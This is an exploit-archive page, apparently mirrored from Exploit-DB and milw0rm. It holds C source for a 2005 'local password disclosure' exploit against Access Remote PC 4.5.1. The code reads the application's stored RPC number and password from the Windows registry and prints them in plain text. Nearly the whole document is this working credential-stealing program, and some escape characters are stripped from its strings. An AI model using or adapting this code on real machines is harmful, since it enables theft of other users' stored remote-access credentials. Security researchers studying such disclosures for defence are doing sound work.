https://www.exploit-db.com/exploits/1086

漏洞细节尚未披露

/*****************************************************************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

int main()
{
       HKEY hKey;
       char RPCNumber[BUF], Password[BUF];
       DWORD dwBuf = BUF;

       if( RegOpenKeyEx( HKEY_CURRENT_USER,
                         "Software\Access Remote PC\Client\Options\Proxy",
                         0,
                         KEY_QUERY_VALUE,
                         &hKey
                         ) !=ERROR_SUCCESS )
       {
               fprintf( stdout, "Access Remote PC is not installed on you PC!n" );
               return -1;
       }

       if( RegQueryValueEx( hKey,
                            "RPCNumber",
                            NULL,
                            NULL,
                            (BYTE *)&RPCNumber,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( RPCNumber,"Not Found!n" );

       if( RegQueryValueEx( hKey,
                            "Password",
                            NULL,
                            NULL,
                            (BYTE *)&Password,
                            &dwBuf
                            ) != ERROR_SUCCESS )
       lstrcpy( Password,"Not Found!n" );

       fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozann" );
       fprintf( stdout, "Credits to AtmaCAn" );
       fprintf( stdout, "www.netmagister.com - www.spyinstructors.com n" );
       fprintf( stdout, "[email protected]" );
       fprintf( stdout, "RPCNumbert: %sn", RPCNumber );
       fprintf( stdout, "Passwordt: %sn", Password );

       return 0;
}

// milw0rm.com [2005-07-04]